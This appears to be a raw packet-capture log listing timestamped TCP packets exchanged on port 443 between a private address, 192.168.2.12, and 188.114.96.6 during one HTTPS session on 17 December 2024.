                                                                        Dec 17, 2024 08:38:33.470793009 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.470808983 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.470813990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.470873117 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.470873117 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.474483013 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.474493980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.474564075 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.474574089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.474631071 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.480994940 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.481019020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.481137991 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.481144905 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.484987020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.485106945 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.485114098 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.491251945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.491275072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.491334915 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.491341114 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.491406918 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.498676062 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.498697996 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.498770952 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.498778105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.498816967 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.567147017 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.642679930 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.642693996 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.642733097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.642786026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.642812967 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.642827988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.642853022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.642893076 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.649804115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.649827957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.649914980 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.649930000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.650041103 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.656861067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.656891108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.656958103 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.656969070 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.657012939 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.657023907 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.663985968 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.664025068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.664143085 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.664143085 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.664155006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.664226055 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.670231104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.670259953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.670361996 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.670373917 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.670387030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.670469999 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.676872015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.676898003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.677027941 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.677027941 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.677042961 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.677093029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.684050083 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.684082985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.684156895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.684163094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.684196949 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.684225082 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.691118002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.691143990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.691217899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.691224098 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.691274881 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.691308022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.835016012 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.835047960 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.835340977 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.835360050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.836289883 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.842004061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.842031956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.842354059 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.842360973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.842406034 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.849136114 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.849162102 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.849252939 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.849261045 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.849311113 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.856271982 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.856322050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.856353998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.856359005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.856409073 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.862492085 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.862518072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.862567902 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.862580061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.862627029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.862627029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.869138002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.869168997 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.869280100 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.869280100 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.869286060 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.869369030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.876254082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.876277924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.876358032 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.876365900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.876399040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.876588106 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.883337975 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.883368015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.883462906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.883462906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.883471012 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.883563042 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.028542995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.028570890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.028845072 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.028872013 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.029052973 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.034610033 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.034670115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.034773111 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.034773111 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.034781933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.034964085 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.041910887 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.041941881 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.042006969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.042013884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.042032957 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.042092085 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.048257113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.048321009 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.048357010 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.048362970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.048405886 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.048405886 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.054989100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.055016041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.055130959 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.055130959 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.055144072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.055325031 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.061769962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.061793089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.061883926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.061889887 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.061933994 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.068933964 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.068989038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.069031954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.069036961 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.069087029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.069087029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.075926065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.075957060 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.076025963 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.076030970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.076059103 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.076071024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.220406055 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.220436096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.220531940 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.220532894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.220550060 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.220603943 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.226624966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.226650000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.226722956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.226727962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.226794958 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.226794958 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.233788967 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.233814001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.233889103 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.233905077 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.233987093 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.240966082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.240974903 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.241139889 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.241147995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.241369963 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.247457981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.247483969 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.247575045 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.247575045 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.247581005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.249721050 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.254772902 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.254801035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.255332947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.255340099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.255600929 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.260855913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.260884047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.260979891 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.260987043 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.261046886 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.261046886 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.268016100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.268043995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.268132925 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.268137932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.268183947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.268183947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.271550894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.412770987 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.412796974 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.412909031 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.412909031 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.412919044 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.413084030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.418924093 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.418950081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.419032097 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.419047117 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.419123888 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.419123888 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.426137924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.426171064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.426285982 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.426304102 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.426418066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.426418066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.433382034 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.433406115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.433479071 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.433495998 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.433546066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.433546066 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.439779997 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.439801931 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.439898014 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.439898014 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.439905882 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.439958096 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.447055101 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.447089911 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.447186947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.447186947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.447194099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.447264910 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.453284979 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.453314066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.453356028 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.453366995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.453424931 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.453424931 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.460526943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.460550070 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.460623026 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.460634947 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.460675001 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.460675001 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.605070114 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.605094910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.605200052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.605212927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.605242968 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.605360985 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.611248970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.611277103 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.611332893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.611342907 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.611423969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.611423969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.618263006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.618285894 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.618429899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.618429899 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.618438005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.618520975 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.625386953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.625407934 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.625525951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.625525951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.625535011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.625577927 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.632051945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.632070065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.632165909 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.632165909 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.632179976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.632320881 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.639210939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.639236927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.639321089 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.639345884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.639619112 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.645401001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.645426989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.645530939 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.645530939 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.645543098 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.645638943 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.652573109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.652602911 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.654057980 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.654104948 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.654310942 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.796719074 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.796750069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.796863079 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.796863079 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.796874046 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.796967030 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.803855896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.803883076 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.804007053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.804008007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.804023981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.804075003 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.810950041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.810977936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.811074018 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.811074018 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.811081886 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.811173916 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.818141937 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.818170071 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.818316936 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.818330050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.818464994 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:34.824223995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.824249983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:34.824704885 CET49716443192.168.2.12188.114.96.6
